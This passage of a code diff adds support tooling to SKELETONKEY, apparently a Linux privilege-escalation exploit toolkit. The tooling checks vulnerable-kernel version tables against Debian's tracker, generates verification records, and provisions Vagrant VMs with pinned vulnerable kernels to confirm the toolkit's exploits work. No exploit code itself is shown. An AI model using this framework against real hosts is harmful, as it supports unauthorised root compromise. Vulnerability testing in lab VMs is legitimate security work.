+            print(f"[*] using cached tracker ({CACHE}, age {int(age)}s)",
+                  file=sys.stderr)
+            with open(CACHE) as f:
+                return json.load(f)
+    print(f"[*] fetching {TRACKER_URL} ...", file=sys.stderr)
+    req = urllib.request.Request(
+        TRACKER_URL,
+        headers={"User-Agent": "skeletonkey/refresh-kernel-ranges"},
+    )
+    with urllib.request.urlopen(req, timeout=120) as r:
+        data = r.read()
+    os.makedirs(os.path.dirname(CACHE), exist_ok=True)
+    with open(CACHE, "wb") as f:
+        f.write(data)
+    print(f"[*] tracker cached: {len(data) // 1024} KB", file=sys.stderr)
+    return json.loads(data)
+
+
+# ── module source parsing ────────────────────────────────────────────
+
+# Some modules have multiple .cve entries (e.g. dirty_frag_esp +
+# dirty_frag_esp6 share the same CVE). Pull the first one.
+RE_CVE = re.compile(r'\.cve\s*=\s*"(CVE-\d{4}-\d{4,7})"')
+RE_TABLE = re.compile(
+    r'kernel_patched_from\s+(\w+)\s*\[\]\s*=\s*\{([^}]+(?:\}[^}]*)*?)\}\s*;',
+    re.MULTILINE,
+)
+RE_ENTRY = re.compile(r'\{\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\}')
+
+
+def find_modules(repo_root: str):
+    """Yield {name, src, cve, table, table_name, table_span} per module.
+
+    `table_span` is (start, end) byte offsets of the array body for
+    --patch mode that wants to edit the source. `table` is a list of
+    (major, minor, patch) tuples in source order."""
+    mods_dir = os.path.join(repo_root, "modules")
+    for d in sorted(os.listdir(mods_dir)):
+        src = os.path.join(mods_dir, d, "skeletonkey_modules.c")
+        if not os.path.exists(src):
+            continue
+        with open(src) as f:
+            text = f.read()
+        cve_m = RE_CVE.search(text)
+        if not cve_m:
+            continue
+        tab_m = RE_TABLE.search(text)
+        if not tab_m:
+            continue
+        entries = [tuple(int(x) for x in e) for e in RE_ENTRY.findall(tab_m.group(2))]
+        if not entries:
+            continue
+        yield {
+            "name": d,
+            "src": src,
+            "cve": cve_m.group(1),
+            "table": entries,
+            "table_name": tab_m.group(1),
+            "table_span": (tab_m.start(2), tab_m.end(2)),
+        }
+
+
+# ── Debian tracker lookup ────────────────────────────────────────────
+
+# Debian release names we care about (in age order, oldest first).
+# The tracker has more (e.g. ELTS) but those are usually too old to
+# inform mainline-or-near-mainline backport thresholds.
+DEBIAN_RELEASES = ["bullseye", "bookworm", "trixie", "forky", "sid"]
+
+
+def parse_upstream_version(deb_ver: str) -> tuple[int, int, int] | None:
+    """Map a Debian package version like '5.10.218-1' to upstream
+    (5, 10, 218). Returns None on parse failure."""
+    if not deb_ver:
+        return None
+    # Strip everything after first '-' (Debian revision) or '+' (backport).
+    head = re.split(r'[-+~]', deb_ver, maxsplit=1)[0]
+    parts = head.split(".")
+    if len(parts) < 3:
+        # Some Debian versions are X.Y (no patch). Treat patch as 0.
+        if len(parts) == 2:
+            parts.append("0")
+        else:
+            return None
+    try:
+        return (int(parts[0]), int(parts[1]), int(parts[2]))
+    except ValueError:
+        return None
+
+
+def debian_fixed_for(tracker: dict, cve: str) -> dict[str, tuple[int, int, int]]:
+    """For a CVE, return {debian_release: upstream_version_tuple} of
+    fixed versions per the tracker. Skips releases with no fix yet."""
+    out: dict[str, tuple[int, int, int]] = {}
+    for pkg in ("linux", "linux-grsec"):
+        pkg_data = tracker.get(pkg, {})
+        if cve not in pkg_data:
+            continue
+        cve_data = pkg_data[cve]
+        for release, info in cve_data.get("releases", {}).items():
+            if release not in DEBIAN_RELEASES:
+                continue
+            if info.get("status") != "resolved":
+                continue
+            fixed = info.get("fixed_version")
+            up = parse_upstream_version(fixed)
+            if up:
+                out[release] = up
+    return out
+
+
+# ── compare + report ─────────────────────────────────────────────────
+
+def branch_of(v: tuple[int, int, int]) -> tuple[int, int]:
+    return (v[0], v[1])
+
+
+def compare(table: list[tuple[int, int, int]],
+            debian: dict[str, tuple[int, int, int]]) -> list[dict]:
+    """Return a list of finding dicts ({severity, message, ...})."""
+    findings: list[dict] = []
+    our_by_branch = {branch_of(t): t for t in table}
+
+    # Group Debian releases by branch (multiple releases may share a branch)
+    debian_by_branch: dict[tuple[int, int], list[tuple[str, tuple[int, int, int]]]] = {}
+    for rel, ver in debian.items():
+        debian_by_branch.setdefault(branch_of(ver), []).append((rel, ver))
+
+    for branch, rels in debian_by_branch.items():
+        # Use the OLDEST fix Debian has on this branch (most permissive)
+        rels.sort(key=lambda x: x[1])
+        oldest_rel, oldest_ver = rels[0]
+        rel_list = ", ".join(f"{r}: {v[0]}.{v[1]}.{v[2]}" for r, v in rels)
+
+        if branch not in our_by_branch:
+            findings.append({
+                "severity": "MISSING",
+                "message": (
+                    f"Debian has fix on the {branch[0]}.{branch[1]} branch "
+                    f"(earliest: {oldest_ver[0]}.{oldest_ver[1]}.{oldest_ver[2]}, "
+                    f"all: {rel_list}), but our table has no {branch[0]}.{branch[1]} entry"
+                ),
+                "suggest_add": list(oldest_ver),
+            })
+        else:
+            our = our_by_branch[branch]
+            if our[2] > oldest_ver[2]:
+                findings.append({
+                    "severity": "TOO_TIGHT",
+                    "message": (
+                        f"Our {our[0]}.{our[1]}.{our[2]} threshold is later than "
+                        f"Debian's earliest fix on the {branch[0]}.{branch[1]} branch "
+                        f"({oldest_ver[0]}.{oldest_ver[1]}.{oldest_ver[2]}, from "
+                        f"{oldest_rel}). Hosts at {branch[0]}.{branch[1]}.{oldest_ver[2]} "
+                        "are patched per Debian but our detect() would report "
+                        "VULNERABLE."
+                    ),
+                    "suggest_replace": list(oldest_ver),
+                })
+            elif our[2] < oldest_ver[2]:
+                # Our threshold is earlier — we're more permissive about
+                # what counts as patched. Usually fine (we have better
+                # info than Debian's stable backport) but flag as info.
+                findings.append({
+                    "severity": "INFO",
+                    "message": (
+                        f"Our {our[0]}.{our[1]}.{our[2]} threshold is earlier "
+                        f"than Debian's {oldest_ver[0]}.{oldest_ver[1]}.{oldest_ver[2]} "
+                        f"({oldest_rel}). We're more permissive — verify this "
+                        "is intentional (e.g. we tracked a different distro's "
+                        "earlier backport)."
+                    ),
+                })
+
+    return findings
+
+
+# ── main ─────────────────────────────────────────────────────────────
+
+def render_text(reports: list[dict]) -> None:
+    """Human-readable report on stderr."""
+    drifted = 0
+    for r in reports:
+        if not r["findings"]:
+            print(f"[+] {r['name']:32s} ({r['cve']}) — table is current "
+                  f"({len(r['table'])} entries)")
+            continue
+        drifted += 1
+        print(f"[!] {r['name']} ({r['cve']})")
+        print(f"    table: " + ", ".join(
+            f"{M}.{m}.{p}" for (M, m, p) in r["table"]))
+        if r["debian"]:
+            print(f"    debian: " + ", ".join(
+                f"{rel}={M}.{m}.{p}"
+                for rel, (M, m, p) in sorted(r["debian"].items())))
+        else:
+            print("    debian: (no resolved entries for this CVE)")
+        for f in r["findings"]:
+            tag = {"MISSING": "+", "TOO_TIGHT": "✗", "INFO": "i"}[f["severity"]]
+            print(f"      [{tag}] {f['message']}")
+        print()
+    total = len(reports)
+    print(f"=== {drifted}/{total} module(s) drifted ===", file=sys.stderr)
+
+
+def render_json(reports: list[dict]) -> None:
+    print(json.dumps({"modules": reports}, indent=2, default=lambda o: list(o)))
+
+
+def render_patch(reports: list[dict]) -> None:
+    """Emit a brief proposed-edits diff for modules with MISSING or
+    TOO_TIGHT findings. Not actually applied — operator reviews."""
+    for r in reports:
+        actionable = [f for f in r["findings"]
+                      if f["severity"] in ("MISSING", "TOO_TIGHT")]
+        if not actionable:
+            continue
+        print(f"--- {r['src']}")
+        print(f"+++ {r['src']} (proposed)")
+        print(f"@@ kernel_patched_from {r['table_name']}[] @@")
+        # Reconstruct the table with the actionable changes applied.
+        new_table = list(r["table"])
+        new_branches = {branch_of(t): list(t) for t in new_table}
+        for f in actionable:
+            if "suggest_add" in f:
+                v = tuple(f["suggest_add"])
+                new_branches[branch_of(v)] = list(v)
+            elif "suggest_replace" in f:
+                v = tuple(f["suggest_replace"])
+                new_branches[branch_of(v)] = list(v)
+        new_sorted = sorted(new_branches.values())
+        old_set = {tuple(t) for t in r["table"]}
+        for entry in new_sorted:
+            t = tuple(entry)
+            if t in old_set:
+                print(f"     {{{entry[0]:>2}, {entry[1]:>2}, {entry[2]:>3}}},")
+            else:
+                print(f" +   {{{entry[0]:>2}, {entry[1]:>2}, {entry[2]:>3}}},")
+        for old in r["table"]:
+            if branch_of(old) not in new_branches or \
+               list(old) != new_branches[branch_of(old)]:
+                print(f" -   {{{old[0]:>2}, {old[1]:>2}, {old[2]:>3}}},")
+        print()
+
+
+def main() -> int:
+    json_mode = "--json" in sys.argv
+    patch_mode = "--patch" in sys.argv
+    force = "--refresh" in sys.argv
+
+    repo_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
+    tracker = fetch_tracker(force_refresh=force)
+
+    if "linux" not in tracker:
+        print("[-] tracker JSON has no 'linux' package — schema changed?",
+              file=sys.stderr)
+        return 1
+
+    reports: list[dict] = []
+    for mod in find_modules(repo_root):
+        debian = debian_fixed_for(tracker, mod["cve"])
+        findings = compare(mod["table"], debian)
+        reports.append({
+            "name": mod["name"],
+            "src": mod["src"],
+            "cve": mod["cve"],
+            "table_name": mod["table_name"],
+            "table": [list(t) for t in mod["table"]],
+            "debian": {k: list(v) for k, v in debian.items()},
+            "findings": findings,
+        })
+
+    if json_mode:
+        render_json(reports)
+    elif patch_mode:
+        render_patch(reports)
+    else:
+        render_text(reports)
+
+    # Exit code: 1 if any MISSING or TOO_TIGHT, 0 otherwise. INFO is fine.
+    actionable = sum(1 for r in reports for f in r["findings"]
+                     if f["severity"] in ("MISSING", "TOO_TIGHT"))
+    return 1 if actionable else 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
@@ -0,0 +1,174 @@
+#!/usr/bin/env python3
+"""
+tools/refresh-verifications.py — read docs/VERIFICATIONS.jsonl,
+generate core/verifications.c with a deduped, sorted lookup table.
+
+Dedup key: (module, vm_box, host_kernel, expect_detect).
+On collision, the LATEST verified_at wins (so re-runs update rather
+than accumulate). Records are then sorted by module name so the
+output is stable and review-friendly.
+
+Records with no module name are dropped silently. Records with
+status != "match" are kept so MISMATCH histories stay visible in
+--module-info (but don't earn the ✓ verified badge).
+
+Usage:
+    tools/refresh-verifications.py            # regenerate core/verifications.c
+    tools/refresh-verifications.py --check    # exit 1 if regenerating would change anything
+"""
+
+import argparse
+import json
+import sys
+from pathlib import Path
+
+REPO = Path(__file__).resolve().parent.parent
+JSONL = REPO / "docs" / "VERIFICATIONS.jsonl"
+OUT_C = REPO / "core" / "verifications.c"
+
+
+def load_records():
+    if not JSONL.exists():
+        return []
+    out = []
+    for line in JSONL.read_text().splitlines():
+        line = line.strip()
+        if not line or line.startswith("#"):
+            continue
+        try:
+            r = json.loads(line)
+            if r.get("module"):
+                out.append(r)
+        except json.JSONDecodeError as e:
+            print(f"[!] skipping bad JSONL line: {e}", file=sys.stderr)
+    return out
+
+
+def dedup_latest(records):
+    """Keep only the latest record per (module, vm_box, host_kernel).
+
+    NB: expect_detect is intentionally NOT part of the dedup key. If we
+    re-verify the same target with a corrected expectation, the new
+    record supersedes the old one entirely (the old MISMATCH was a stale
+    target-yaml entry, not a separate test scenario)."""
+    by_key = {}
+    for r in records:
+        k = (r.get("module"), r.get("vm_box"), r.get("host_kernel"))
+        prev = by_key.get(k)
+        if prev is None or r.get("verified_at", "") > prev.get("verified_at", ""):
+            by_key[k] = r
+    return sorted(by_key.values(),
+                  key=lambda r: (r["module"], r.get("vm_box", ""),
+                                 r.get("host_kernel", "")))
+
+
+def date_only(iso_ts: str) -> str:
+    """Truncate 2026-05-23T19:26:02Z -> 2026-05-23."""
+    if not iso_ts:
+        return ""
+    return iso_ts.split("T", 1)[0]
+
+
+def cstr(s):
+    if s is None or s == "":
+        return '""'
+    # No paths in here ever contain unescapable chars; basic backslash + quote escape.
+    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'
+
+
+def render_c(records) -> str:
+    lines = [
+        "/*",
+        " * SKELETONKEY — verification records table",
+        " *",
+        " * AUTO-GENERATED by tools/refresh-verifications.py from",
+        " * docs/VERIFICATIONS.jsonl. Do not hand-edit; rerun the script.",
+        " *",
+        " * Source: tools/verify-vm/verify.sh appends one JSON record per",
+        " * run; this generator dedupes to (module, vm_box, kernel, expect)",
+        " * and keeps the latest by verified_at.",
+        " */",
+        "",
+        '#include "verifications.h"',
+        "",
+        "#include <stddef.h>",
+        "#include <string.h>",
+        "#include <stdbool.h>",
+        "",
+        "const struct verification_record verifications[] = {",
+    ]
+    for r in records:
+        lines.append("    {")
+        lines.append(f"        .module        = {cstr(r.get('module'))},")
+        lines.append(f"        .verified_at   = {cstr(date_only(r.get('verified_at', '')))},")
+        lines.append(f"        .host_kernel   = {cstr(r.get('host_kernel'))},")
+        lines.append(f"        .host_distro   = {cstr(r.get('host_distro'))},")
+        lines.append(f"        .vm_box        = {cstr(r.get('vm_box'))},")
+        lines.append(f"        .expect_detect = {cstr(r.get('expect_detect'))},")
+        lines.append(f"        .actual_detect = {cstr(r.get('actual_detect'))},")
+        lines.append(f"        .status        = {cstr(r.get('status'))},")
+        lines.append("    },")
+    lines += [
+        "};",
+        "",
+        "const size_t verifications_count =",
+        "    sizeof(verifications) / sizeof(verifications[0]);",
+        "",
+        "const struct verification_record *",
+        "verifications_for_module(const char *module, size_t *count_out)",
+        "{",
+        "    if (count_out) *count_out = 0;",
+        "    if (!module) return NULL;",
+        "    const struct verification_record *first = NULL;",
+        "    size_t n = 0;",
+        "    for (size_t i = 0; i < verifications_count; i++) {",
+        "        if (strcmp(verifications[i].module, module) == 0) {",
+        "            if (first == NULL) first = &verifications[i];",
+        "            n++;",
+        "        }",
+        "    }",
+        "    if (count_out) *count_out = n;",
+        "    return first;",
+        "}",
+        "",
+        "bool verifications_module_has_match(const char *module)",
+        "{",
+        "    size_t n = 0;",
+        "    const struct verification_record *r = verifications_for_module(module, &n);",
+        "    for (size_t i = 0; i < n; i++)",
+        "        if (r[i].status && strcmp(r[i].status, \"match\") == 0)",
+        "            return true;",
+        "    return false;",
+        "}",
+        "",
+    ]
+    return "\n".join(lines)
+
+
+def main() -> int:
+    ap = argparse.ArgumentParser(description=__doc__.splitlines()[1])
+    ap.add_argument("--check", action="store_true",
+                    help="diff against committed core/verifications.c; exit 1 on drift")
+    args = ap.parse_args()
+
+    records = dedup_latest(load_records())
+    text = render_c(records)
+
+    if args.check:
+        existing = OUT_C.read_text() if OUT_C.exists() else ""
+        if existing == text:
+            print(f"[+] core/verifications.c is current ({len(records)} record(s))",
+                  file=sys.stderr)
+            return 0
+        print("[!] core/verifications.c drifted — rerun "
+              "tools/refresh-verifications.py", file=sys.stderr)
+        return 1
+
+    OUT_C.write_text(text)
+    print(f"[+] wrote {OUT_C.relative_to(REPO)} ({len(records)} record(s))",
+          file=sys.stderr)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
@@ -0,0 +1,134 @@
+# SKELETONKEY VM verification
+
+Auto-provisions a Parallels Desktop VM with a known-vulnerable kernel,
+runs `skeletonkey --explain <module> --active` inside it, and emits a
+verification record. Closes the loop between "detect() compiles & passes
+unit tests" and "exploit() actually works on a real vulnerable kernel."
+
+## One-time setup
+
+```bash
+./tools/verify-vm/setup.sh
+```
+
+That installs (if missing): Vagrant via Homebrew, the `vagrant-parallels`
+plugin, and pre-downloads ~5 GB of base boxes (Ubuntu 18.04/20.04/22.04
+ Debian 11/12). Idempotent — re-run any time.
+
+To skip boxes you don't need (save disk):
+
+```bash
+./tools/verify-vm/setup.sh ubuntu2004 debian11   # only those two
+```
+
+## Verify a single module
+
+```bash
+./tools/verify-vm/verify.sh nf_tables
+```
+
+What that does:
+
+1. Reads `tools/verify-vm/targets.yaml`: finds `nf_tables` → box
+   `generic/ubuntu2204` + kernel pin `linux-image-5.15.0-43-generic`.
+2. `vagrant up skk-nf_tables` (provisions on first call, resumes on
+   subsequent).
+3. Installs the pinned vulnerable kernel via `apt`, reboots.
+4. Mounts the local repo at `/vagrant`, runs `make`, then runs
+   `skeletonkey --explain nf_tables --active`.
+5. Parses the `VERDICT:` line, compares against `expect_detect` from
+   targets.yaml, emits a JSON verification record on stdout.
+6. Suspends the VM (`vagrant suspend`) — instant resume next run.
+
+Lifecycle flags:
+
+```bash
+./tools/verify-vm/verify.sh nf_tables --keep      # leave VM running; ssh in to inspect
+./tools/verify-vm/verify.sh nf_tables --destroy   # full teardown after run
+```
+
+## List every target
+
+```bash
+./tools/verify-vm/verify.sh --list
+```
+
+Shows the (module, box, target kernel, expected verdict, notes) matrix
+for all 26 modules. Three are flagged `manual: true` because no
+public Vagrant box covers them:
+
+- `vmwgfx` — only reachable on VMware guests; needs a vSphere/Fusion VM
+  not Parallels.
+- `dirtydecrypt`, `fragnesia` — only present in Linux 7.0+ which isn't
+  shipping as a distro kernel yet.
+
+For those, verification needs a hand-built or special-distro VM.
+
+## Verification records
+
+`verify.sh` emits JSON on stdout after each run. Example:
+
+```json
+{
+  "module":        "nf_tables",
+  "verified_at":   "2026-05-23T17:42:11Z",
+  "host_kernel":   "5.15.0-43-generic",
+  "host_distro":   "Ubuntu 22.04.5 LTS",
+  "vm_box":        "generic/ubuntu2204",
+  "expect_detect": "VULNERABLE",
+  "actual_detect": "VULNERABLE",
+  "status":        "match",
+  "log":           "tools/verify-vm/logs/verify-nf_tables-20260523-174211.log"
+}
+```
+
+`status: match` means detect() returned what we expected on a known-
+vulnerable kernel. Anything else (`MISMATCH`, status code != 0) means
+either:
+
+- The kernel pin didn't take (check `host_kernel` against
+  `kernel_version` in targets.yaml).
+- The exploit's preconditions aren't met in the default Vagrant image
+  (e.g. apparmor blocks unprivileged userns; need to adjust the
+  Vagrantfile provisioner).
+- The detect() logic is wrong for this kernel/distro combo (a real bug
+  — fix it).
+
+Records are intended to feed a per-module `verified_on[]` table (next
+project step) so `--list` can show a `✓ verified <date>` column.
+
+## How it routes module → box
+
+Mapping lives in `tools/verify-vm/targets.yaml`. Each entry has:
+
+- `box` — which `boxes/` template (e.g. `ubuntu2204`)
+- `kernel_pkg` — apt package name to install if the stock kernel
+  is patched (omit / empty if stock is already vulnerable)
+- `kernel_version` — what `uname -r` should report after install
+- `expect_detect` — `VULNERABLE` | `OK` | `PRECOND_FAIL`
+- `notes` — short rationale; comments in the file have the full context
+
+Adding a new module is one block in targets.yaml. The verifier picks
+it up automatically.
+
+## Files
+
+```
+tools/verify-vm/
+├── README.md       this file
+├── setup.sh        one-time bootstrap (Vagrant, plugin, box cache)
+├── verify.sh       per-module verifier
+├── Vagrantfile     parameterized VM config (driven by SKK_VM_* env vars)
+├── targets.yaml    module → box mapping with rationale
+└── logs/           per-verification stdout/stderr capture
+```
+
+## Why Vagrant + Parallels
+
+You already have Parallels Desktop. `vagrant-parallels` gives a
+scriptable per-VM config + a curated public box library + idempotent
+`vagrant up/provision/reload/suspend` lifecycle. The Vagrantfile is
+parameterized via env vars so a single file drives every target.
+
+Alternative providers (Lima, Multipass) would also work; Vagrant was
+chosen for ergonomic continuity with the existing Parallels install.
@@ -0,0 +1,152 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+#
+# tools/verify-vm/Vagrantfile — parameterized verifier VM.
+#
+# Driven by env vars set by tools/verify-vm/verify.sh:
+#
+#   SKK_VM_BOX            generic/<box> name (e.g. generic/debian11)
+#   SKK_VM_KERNEL_PKG     optional apt package for the vulnerable kernel
+#                         (e.g. linux-image-5.13.0-19-generic). Empty = use stock.
+#   SKK_VM_KERNEL_VERSION expected kernel version after install
+#   SKK_VM_HOSTNAME       hostname for this VM (used in vagrant box name)
+#
+# The Vagrantfile mounts the repo root at /vagrant (Vagrant default) so the
+# in-VM `make` builds against your live source — no rebuild loop.
+
+require "yaml"
+
+REPO_ROOT = File.expand_path("../..", __dir__)
+
+box      = ENV["SKK_VM_BOX"]              || "generic/debian12"
+pkg      = ENV["SKK_VM_KERNEL_PKG"]       || ""
+mainline = ENV["SKK_VM_MAINLINE_VERSION"] || ""
+kver     = ENV["SKK_VM_KERNEL_VERSION"]   || ""
+host     = ENV["SKK_VM_HOSTNAME"]         || "skk-verify"
+
+Vagrant.configure("2") do |c|
+  # Define ONE Vagrant machine named after SKK_VM_HOSTNAME. Per-module
+  # isolation: each module gets its own `skk-<module>` machine that
+  # vagrant tracks in .vagrant/machines/skk-<module>/parallels/.
+  c.vm.define host do |m|
+    m.vm.box = box
+    # Guest hostnames forbid underscores per RFC 952. Vagrant machine
+    # names allow them (we keep skk-cgroup_release_agent so per-module
+    # state stays isolated in .vagrant/machines/), but inside the VM
+    # we translate to hyphens so the hostname is RFC-valid.
+    m.vm.hostname = host.gsub("_", "-")
+
+    m.vm.synced_folder REPO_ROOT, "/vagrant",
+      type: "rsync", rsync__exclude: ["build/", ".git/", "*.o", "skeletonkey-test*"]
+
+    m.vm.provider "parallels" do |p|
+      p.memory = 2048
+      p.cpus   = 2
+      p.name   = host
+      # Don't auto-update Parallels Tools: the installer fails on older
+      # guest kernels (e.g. Ubuntu 20.04's 5.4.0-169 is "outdated and
+      # not supported" by latest tools). We use rsync over SSH for
+      # sync_folder, which doesn't need the guest tools at all.
+      p.update_guest_tools = false
+      p.check_guest_tools  = false
+    end
+
+    # 1. Always install build deps + sudo (needed for module verification).
+    m.vm.provision "shell", inline: <<-SHELL
+      set -e
+      if command -v apt-get >/dev/null 2>&1; then
+          export DEBIAN_FRONTEND=noninteractive
+          apt-get update -qq
+          apt-get install -y -qq build-essential libglib2.0-dev pkg-config sudo curl ca-certificates
+      elif command -v dnf >/dev/null 2>&1; then
+          dnf install -y -q gcc make glib2-devel pkgconfig sudo curl
+      fi
+    SHELL
+
+    # 2a. Pin via apt if requested. Reboot needed afterward.
+    if !pkg.empty?
+      m.vm.provision "shell", name: "pin-kernel-#{pkg}", inline: <<-SHELL
+        set -e
+        if dpkg-query -W -f='${Status}' #{pkg} 2>/dev/null | grep -q 'install ok installed'; then
+            echo "[=] #{pkg} already installed"
+        else
+            echo "[+] installing #{pkg} (kernel target #{kver})"
+            export DEBIAN_FRONTEND=noninteractive
+            apt-get install -y -qq #{pkg}
+            echo "[i] kernel #{pkg} installed; reboot via 'vagrant reload'"
+        fi
+      SHELL
+    end
+
+    # 2b. Pin via kernel.ubuntu.com/mainline/ if mainline_version is set.
+    # Fetches the four .debs (linux-headers _all, linux-headers _amd64
+    # generic, linux-image-unsigned generic, linux-modules generic),
+    # dpkg -i's them, regenerates grub, and prints a reboot hint.
+    # Mainline kernel package version like "5.15.5-051505" sorts ABOVE
+    # Ubuntu's stock "5.15.0-91" in debian-version-compare (numeric
+    # 51505 > 91), so update-grub puts it at boot index 0 and the next
+    # boot lands on it automatically.
+    if !mainline.empty?
+      m.vm.provision "shell", name: "pin-mainline-#{mainline}", inline: <<-SHELL
+        set -e
+        KVER="#{mainline}"
+        # already booted into it?
+        if uname -r | grep -q "^${KVER}-[0-9]\\+-generic"; then
+            echo "[=] mainline ${KVER} already booted ($(uname -r))"
+            exit 0
+        fi
+        # already installed on disk (waiting on reboot)?
+        if ls /boot/vmlinuz-${KVER}-* >/dev/null 2>&1; then
+            echo "[=] mainline ${KVER} already installed; needs reboot"
+            exit 0
+        fi
+        echo "[+] fetching kernel.ubuntu.com mainline v${KVER}"
+        URL="https://kernel.ubuntu.com/mainline/v${KVER}/amd64/"
+        TMP=$(mktemp -d)
+        cd "$TMP"
+        # Pick the 4 canonical generic-kernel .debs by pattern match against
+        # the directory index. Skip lowlatency variants.
+        DEBS=$(curl -sL "$URL" | \\
+            grep -oE 'href="[^"]+\\.deb"' | sed 's/href="//; s/"$//' | \\
+            grep -E '(linux-image-unsigned|linux-modules|linux-headers)-[0-9.]+-[0-9]+-generic_|linux-headers-[0-9.]+-[0-9]+_[^_]+_all\\.deb' | \\
+            grep -v lowlatency)
+        if [ -z "$DEBS" ]; then
+            echo "[-] no .debs found at $URL — does the version exist on kernel.ubuntu.com?" >&2
+            exit 2
+        fi
+        for f in $DEBS; do
+            echo "[+]   $f"
+            curl -fsSL -O "${URL}${f}"
+        done
+        export DEBIAN_FRONTEND=noninteractive
+        dpkg -i *.deb || apt-get install -f -y -qq
+        update-grub 2>&1 | tail -3
+        echo "[i] mainline ${KVER} installed; reboot via 'vagrant reload'"
+      SHELL
+    end
+
+    # 3. Build SKELETONKEY in-VM and run --explain --active for the target
+    #    module. Runs as the unprivileged 'vagrant' user (NOT root) — most
+    #    detect()s gate on "are you already root?" and short-circuit if so,
+    #    which would invalidate every verification (pack2theroot was the
+    #    motivating case). 'privileged: false' is how vagrant downshifts.
+    #    SKK_MODULE is set by verify.sh on the second-pass `vagrant
+    #    provision` call (post-reboot if kernel was pinned).
+    m.vm.provision "shell", name: "build-and-verify", run: "never",
+      privileged: false,
+      env: { "SKK_MODULE" => ENV["SKK_MODULE"] || "" },
+      inline: <<-SHELL
+      set -e
+      cd /vagrant
+      echo "[*] running as $(id)"
+      echo "[*] kernel: $(uname -r)"
+      echo "[*] building skeletonkey..."
+      make clean >/dev/null 2>&1 || true
+      make 2>&1 | tail -3
+      echo
+      echo "[*] running: skeletonkey --explain ${SKK_MODULE} --active"
+      echo
+      ./skeletonkey --explain "${SKK_MODULE}" --active 2>&1 || true
+    SHELL
+  end
+end
@@ -0,0 +1,96 @@
+#!/usr/bin/env bash
+# tools/verify-vm/setup.sh — one-shot bootstrap for SKELETONKEY VM verification.
+#
+# What this does (idempotent — re-runs are safe):
+#   1. Verifies Parallels Desktop is installed (you said you wanted to keep it).
+#   2. Installs Vagrant via Homebrew if missing.
+#   3. Installs the vagrant-parallels plugin if missing.
+#   4. Pre-downloads a curated set of base boxes so first-use of `verify.sh`
+#      doesn't hit a ~5 GB download.
+#
+# Cached boxes (~5-6 GB total on disk):
+#   - generic/ubuntu1804  (4.15.0 stock; covers CVE-2016/2017/2019)
+#   - generic/ubuntu2004  (5.4.0; covers CVE-2020/2021/2022 partial)
+#   - generic/ubuntu2204  (5.15.0; covers CVE-2023/2024)
+#   - generic/debian11    (5.10.0; covers CVE-2021/2022)
+#   - generic/debian12    (6.1.0; covers CVE-2024-2026)
+#
+# Disk savings: skip the boxes you don't need by passing them on the cmdline,
+# e.g. `setup.sh ubuntu2004 debian11` only fetches those two.
+
+set -euo pipefail
+
+PARALLELS_APP=/Applications/Parallels\ Desktop.app
+DEFAULT_BOXES=(generic/ubuntu1804 generic/ubuntu2004 generic/ubuntu2204
+               generic/debian11 generic/debian12)
+
+# Allow per-box override on the cmdline.
+if [[ $# -gt 0 ]]; then
+    BOXES=()
+    for arg in "$@"; do
+        case "$arg" in
+            ubuntu1804|ubuntu2004|ubuntu2204|debian11|debian12)
+                BOXES+=("generic/$arg") ;;
+            generic/*) BOXES+=("$arg") ;;
+            *) echo "[-] unknown box: $arg (expected ubuntu1804|2004|2204|debian11|12)" >&2; exit 2 ;;
+        esac
+    done
+else
+    BOXES=("${DEFAULT_BOXES[@]}")
+fi
+
+echo "[*] SKELETONKEY VM verification — bootstrap"
+echo
+
+# 1. Parallels Desktop check
+if [[ ! -d "$PARALLELS_APP" ]]; then
+    echo "[-] Parallels Desktop not found at $PARALLELS_APP" >&2
+    echo "    Install it first: https://www.parallels.com/products/desktop/" >&2
+    exit 1
+fi
+echo "[+] Parallels Desktop: present"
+
+# 2. Vagrant
+if ! command -v vagrant >/dev/null 2>&1; then
+    if ! command -v brew >/dev/null 2>&1; then
+        echo "[-] Homebrew not found; install from https://brew.sh first" >&2
+        exit 1
+    fi
+    echo "[*] installing vagrant via brew..."
+    brew install --cask vagrant
+fi
+echo "[+] vagrant: $(vagrant --version)"
+
+# 3. vagrant-parallels plugin
+if ! vagrant plugin list 2>/dev/null | grep -q vagrant-parallels; then
+    echo "[*] installing vagrant-parallels plugin..."
+    vagrant plugin install vagrant-parallels
+fi
+echo "[+] vagrant-parallels: $(vagrant plugin list | grep vagrant-parallels)"
+
+# 3.5. (verify.sh parses targets.yaml with awk — no Python deps required)
+
+# 4. Pre-download boxes (each ~700 MB to ~1.5 GB)
+echo
+echo "[*] pre-downloading ${#BOXES[@]} base box(es)..."
+for box in "${BOXES[@]}"; do
+    if vagrant box list 2>/dev/null | grep -q "^$box "; then
+        echo "[=] $box already cached (skip)"
+    else
+        echo "[+] fetching $box..."
+        vagrant box add "$box" --provider=parallels --no-tty
+    fi
+done
+
+echo
+echo "[+] verification environment ready."
+echo
+echo "Next:"
+echo "    ./tools/verify-vm/verify.sh <module>"
+echo
+echo "Try:"
+echo "    ./tools/verify-vm/verify.sh nf_tables"
+echo "    ./tools/verify-vm/verify.sh dirty_pipe --keep   # don't destroy VM after"
+echo
+echo "List the curated targets:"
+echo "    cat ./tools/verify-vm/targets.yaml"
@@ -0,0 +1,222 @@
+# tools/verify-vm/targets.yaml — VM verification targets per module
+#
+# For each module, the (box, kernel) pair the verifier should spin up to
+# empirically confirm detect() + exploit() against a KNOWN-VULNERABLE
+# kernel. Picked from Debian snapshot / kernel.ubuntu.com / Ubuntu HWE
+# archives — every version below is fetch-able as a .deb package.
+#
+# Schema:
+#   <module_name>:
+#     box:             vagrant box name (matches tools/verify-vm/boxes/<NAME>/)
+#     kernel_pkg:      apt package name to install for the vulnerable kernel
+#                      (omit / empty if the stock distro kernel is already vulnerable)
+#     kernel_version:  expected /proc/version-style major.minor.patch
+#     expect_detect:   what skeletonkey --explain should say on a confirmed-vulnerable
+#                      target. One of: VULNERABLE | OK | PRECOND_FAIL.
+#     notes:           short rationale for the target choice.
+#
+# Boxes available (matches tools/verify-vm/boxes/):
+#   debian11    — Debian 11 bullseye (5.10.0 stock)
+#   debian12    — Debian 12 bookworm (6.1.0 stock)
+#   ubuntu1804  — Ubuntu 18.04 LTS  (4.15.0 stock; HWE up to 5.4)
